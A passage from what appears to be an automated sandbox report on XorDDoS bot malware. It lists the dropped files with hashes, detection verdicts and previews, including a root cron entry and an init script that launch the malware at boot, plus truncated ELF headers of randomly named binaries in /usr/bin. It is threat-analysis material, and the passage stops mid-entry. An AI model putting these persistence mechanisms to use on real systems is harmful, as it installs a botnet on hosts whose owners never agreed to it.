                                                                  Preview: */3 * * * * root /etc/cron.hourly/gcc.sh.
                                                                  /etc/init.d/XZFWLZVF1Z
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:POSIX shell script, ASCII text executable
                                                                  Category:dropped
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.324802294313198
                                                                  Encrypted:false
                                                                  SSDEEP:6:hUtoFdU9qsKheJDBE21YJvmNeMwhy21DzRI+6Mzb4:61DBEMO1Lzu+zM
                                                                  MD5:562A23DC2EDA2CF64C5A08A5A6FDE3AC
                                                                  SHA1:061E5B112E7E2879CA919C2F709B3446632B562E
                                                                  SHA-256:DEC1047792DF19AF4F297BC937272999D639C7A626EC3A9D2D022723CC01B25D
                                                                  SHA-512:B80721ED6FF7DB793B3549ECB72A83BE45C657CCBFA610A33EB3FE78BEE514AECE56A98EBF697CE7E344FC98D4B440A61C560447F6087496100ACA4717B94A80
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview: #!/bin/sh.# chkconfig: 12345 90 90.# description: XZFWLZVF1Z.### BEGIN INIT INFO.# Provides:..XZFWLZVF1Z.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.XZFWLZVF1Z.### END INIT INFO.case $1 in.start)../tmp/XZFWLZVF1Z..;;.stop)..;;.*)../tmp/XZFWLZVF1Z..;;.esac.
                                                                  /memfd:snapd-env-generator (deleted)
                                                                  Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):76
                                                                  Entropy (8bit):3.7627880354948586
                                                                  Encrypted:false
                                                                  SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                  MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                  SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                  SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                  SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                  /run/gcc.pid
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):32
                                                                  Entropy (8bit):4.140319531114783
                                                                  Encrypted:false
                                                                  SSDEEP:3:V2cEJBUjPNA:Vo/CS
                                                                  MD5:7F3ED9CD919C513F1B9778563A6C126F
                                                                  SHA1:7B857A5AA4B4D80079202500F43FAEAB722E4677
                                                                  SHA-256:A44BD21A34B91DCDBB24F8976ECCDE9F9D7C983D0CC6B7A8CB8CA7120D843D58
                                                                  SHA-512:B0570BA3240AF8E7B65F09F8BBAEE6D3BD5234C6BF2FBE2A5D45AE0F5695645116F48C9703D66BAD88F6059CEE6B71AB925336295B1C63BC9EF176F2EE94BFCE
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: piknazyenpjicszawrmivxqfqrvfnjhe
                                                                  /usr/bin/akxqlcphlm
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548638
                                                                  Entropy (8bit):6.197526536252319
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojt:/fUywKQ7Fb1pNL/p52fjQn36Eut
                                                                  MD5:15005B1FF675843EFF1F6E6B4E86968C
                                                                  SHA1:803909D56AFC4ADE46E5F90EE8D9B04F58688201
                                                                  SHA-256:EF0E47613D79354DA924081748C925EE9F7A6F67E1F9CC92E201E9835820FEA4
                                                                  SHA-512:5FF59D0D1F36784BABDCF43666902B00B1EB0B9190EB5295AF9ABC39798C07D1298FFB4F4284F4A193F0817566A7A2B7DF1792E96EEC50DDE3AEB924762725B8
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/akxqlcphlm, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Reputation:low
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/bingytdcwk
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548627
                                                                  Entropy (8bit):6.1974896042053
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eoji:/fUywKQ7Fb1pNL/p52fjQn36Eui
                                                                  MD5:99CB05F7504DE48289B5497F2BA8751E
                                                                  SHA1:0F49F7B25E4787C0A557BB93894D17C997074707
                                                                  SHA-256:C39FC1AA2927EB9879126534BC5702319F082D991DFBA7675C9FCC399BB6F113
                                                                  SHA-512:D8CC3B3398EB1123C80AE0ABFA55829B16C262187B39E710F83A64B0E7D9DC947DEA2429EC1CC5D4E7F7AB92F7EBD84BA9EE2C881773C5DD789EF909669644E3
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/bingytdcwk, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Reputation:low
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/hhmykaposi
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548627
                                                                  Entropy (8bit):6.197493808339232
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojx:/fUywKQ7Fb1pNL/p52fjQn36Eux
                                                                  MD5:0ACF5A216E59D96B030E0170813FA8D1
                                                                  SHA1:97A7631913960BA00BC0E10209F18A0541C25FD6
                                                                  SHA-256:37A7525311AF5C252669855C78524AD0BB4901A998C5C79FBEABEC3856F2C875
                                                                  SHA-512:11C0116AEE88693DBE67CC975D4E8B042682A7E2CFF71A9611FA6CEE0636AD936B1D75D9CE72429238A7E3A16AC818BEC069A0B5F1E1A8EEC8EBE5020012C317
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/hhmykaposi, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Reputation:low
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/kexmeeeolw
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548627
                                                                  Entropy (8bit):6.197492410090912
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojj:/fUywKQ7Fb1pNL/p52fjQn36Euj
                                                                  MD5:BBC6CE9C97F6973D61F78FC452AAB5C7
                                                                  SHA1:0B85C8A02562EC753B5592D4AE928FD96F64B464
                                                                  SHA-256:860CC4CEF082EDDF1BE5DAF2894219143F225D8D954C74875306C9C1600D1998
                                                                  SHA-512:A64E8B6DA40BF1FC4B7F1247C06F99F1FE002412E6A8754B1A505E0B1E2356DF353034A759520B200EE42A525F06F9B6A4BE41D2BDBF4D1D8CC3A44816AD7B68
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/kexmeeeolw, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Reputation:low
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/lzqmjtjpqw
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548627
                                                                  Entropy (8bit):6.197495371419896
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojx:/fUywKQ7Fb1pNL/p52fjQn36Eux
                                                                  MD5:7A667D082ECD9AC2CDD0AEABC5B8446D
                                                                  SHA1:0A41B29E6F2AD1F4174D68C46B609AD5ADEA8EFF
                                                                  SHA-256:DBAC4A200322781738CF887CA37735BAE6CE3F5968493FCD40EF659E406EB993
                                                                  SHA-512:BC97910F4D2F85938D89DC333EAA35877BA5CA83E7A33B64C5A2FD64481FF5B315003C409AAA6B1373AB2D97394AA096A8F6ABF8DA69AB2E5E8E7B48ED4284A6
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/lzqmjtjpqw, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Reputation:low
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/mligukcpvp
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548627
                                                                  Entropy (8bit):6.197480683617027
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojU:/fUywKQ7Fb1pNL/p52fjQn36EuU
                                                                  MD5:AAED11DC1D18164DEA6192E21F9E544E
                                                                  SHA1:16FBE843E4129BA5F025FFA190AA9E37AAA26E31
                                                                  SHA-256:1C480EB9E16752C8BD59FF04901A5CB3F705086C6CA45EC806BF8CC964480791
                                                                  SHA-512:CD882879B44B6324BC5E98FD0969409AC1F8BA9E219DF81E2AE6D929DB70ACA91684B166DED3FB627272C8270FE78C256AC2FDA439398F89CDFB1D5C56A6E186
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/mligukcpvp, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/ppozyahgxh
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548627
                                                                  Entropy (8bit):6.1974928606913755
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojl:/fUywKQ7Fb1pNL/p52fjQn36Eul
                                                                  MD5:10D6CF5F9FFDF83976FE612372512B0C
                                                                  SHA1:DE10DD21D488B59EB5C17473980BB398E31E1909
                                                                  SHA-256:71E07584D6DF539A2A3823CE2BC659AFC1A9D1C99CA55B272525155D11798DBC
                                                                  SHA-512:28BE3B6A117AB107F429F4FAB72A4AB9840F9F22BDAA2D4AA1C155CB574A8102B8DAD2733E1BDF46038D6582AF47D1C4E940B7045551C599EAD1B2EFDC611380
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ppozyahgxh, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/prxseumwxz
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, missing section headers
                                                                  Category:dropped
                                                                  Size (bytes):413696
                                                                  Entropy (8bit):6.321853356482051
                                                                  Encrypted:false
                                                                  SSDEEP:6144:axnm9lfABacn+mKwrXW52+ipNTJVP3nWydo4tdZ9XpCz16MwYPFM5FgjTcxpQyVw:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbzw
                                                                  MD5:DC546123188B7C41D44209D26A56847F
                                                                  SHA1:7791E830FDAD1EB807438CBB5B1E6A7777E19BF8
                                                                  SHA-256:9CF34B41DD34981BBE043D0D1C56AED16EDD4D76F1F0CCF0303AAFE53F441169
                                                                  SHA-512:E71F9E0C02844EEB2FFB085AA7A33CC73277E4B68677C631521C3F0F4AFB56ACFE8E28CDFC56312255F97F71CA0262A74EB2A21D666447A3ADFE7502925E5992
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/qkswzskzvm
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548671
                                                                  Entropy (8bit):6.197679464171794
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eoje:/fUywKQ7Fb1pNL/p52fjQn36Eue
                                                                  MD5:86E4C1AB0DFD4B3035858198DDF0637D
                                                                  SHA1:CBE2BD4962274F3A4BE5063BBD1B9152184D52A6
                                                                  SHA-256:FEE4E86210A165D6482B15FB5B42B6AD77ECCDFBA9CCDFF519E2D99EC6C17ED4
                                                                  SHA-512:EFEBEAC4ED8873842224F33950D43AA4393AD7A3131759DE676B413CE6919D40C955EBE4B58C06F24C9352AEFFDFA143132C5CA80AFABE69E409D6247C40C2EA
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/qkswzskzvm, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/uprkxpaulc
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548638
                                                                  Entropy (8bit):6.197553741715286
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojt:/fUywKQ7Fb1pNL/p52fjQn36Eut
                                                                  MD5:4DE43037F11F701F92D366AC0F9F2E9A
                                                                  SHA1:95F5DC3B67AF66897EA8D9066E5E7A82A0237FB6
                                                                  SHA-256:58812F8119F5849A16D0D9E42E198A0334589A9DF6DF18933EBC2C66955E1830
                                                                  SHA-512:8A28DC4BBF545283F9F1A3692921DA2D3E2F39F318947A85EE96BE2D996315C3A615477F4B1FE6833EECFEFAFEC4640D4853FA6A8DCDABAAA423D54BBB6DAC66
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uprkxpaulc, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/vxnottgwjc
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548627
                                                                  Entropy (8bit):6.197486971885398
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojz:/fUywKQ7Fb1pNL/p52fjQn36Euz
                                                                  MD5:6D4EBA06D1CF1D5747184FF55E34EA65
                                                                  SHA1:1F9DC9B3FB7903387BA7B6F9C95F0EF98B48FCFB
                                                                  SHA-256:A1BC10FF9C6707F48A57AC736BD72A6006F5C16C63E32101506A2440AF556930
                                                                  SHA-512:C3E382ACC19343067CF6B8D511843941208AA75F6AFB8A51F9A4060C41374FCC5DA0EC26098AC861D6088D4945496F6F306D9EB0F1D606480245241DCCC90423
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/vxnottgwjc, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/wqgmxyrptd
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548627
                                                                  Entropy (8bit):6.197495572691989
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eoje:/fUywKQ7Fb1pNL/p52fjQn36Eue
                                                                  MD5:1BC009A7F083DB215BF84E9C47F473DF
                                                                  SHA1:1EE233877C4002FC9D64C44A7C4F965FB7E930B3
                                                                  SHA-256:CC5F26E211CF6660EB7531BD9E9A3E82CB60567263C650EF6C24CCAFE64F4DBC
                                                                  SHA-512:FE12EE4A3D5C53E761788733650150C7B1F5FD8DEE9F2887658C7232E8FD5AB067B8FF2F162BDA56E65C6733524D512A376F2F778CB3400F1F3A09B5A0F9BFEE
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wqgmxyrptd, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/xnntpqonav
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548627
                                                                  Entropy (8bit):6.197489435910681
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojg:/fUywKQ7Fb1pNL/p52fjQn36Eug
                                                                  MD5:BB587EBC1EFD7483BE7EBAA646FD58BF
                                                                  SHA1:B499779FE88483C3E1CCAF5E5CA8A8B5D99A38D2
                                                                  SHA-256:8C37C93C444357C099E1F5505476A5CFFA6C4B5EF84A459D56AC2B22DBB79BCD
                                                                  SHA-512:D10C347D375EEB0C5BEA1BC251ADE0EBE7C29BE9898167F701BB42FB70FB80FC9B4C8AFF96CCC7EBC18D5D178D4A9A5EDA58F240FC4C139A80D5C31D485B60CA
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/xnntpqonav, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/ybfpvjxtlx
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548627
                                                                  Entropy (8bit):6.197489334984137
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojl:/fUywKQ7Fb1pNL/p52fjQn36Eul
                                                                  MD5:070327196E903C59B3AE1A9DBDA601D6
                                                                  SHA1:A0A4D96E11E89ABAD008A819A96D32B77E6187A9
                                                                  SHA-256:EA22953930B7C62B0AB2DA580C1DEA7E99A3B92AFC6B7059F21139DBD7621967
                                                                  SHA-512:998627ADF282D0F31D0B72A3FFB7E48BA7F2E62D59F1B76329FF505117D0E3832C2901C375806DB73DE71550671CAA69861E2977B7835E9EBBB30F1F4FCAD8A0
                                                                  Malicious:true
                                                                  Yara Hits:
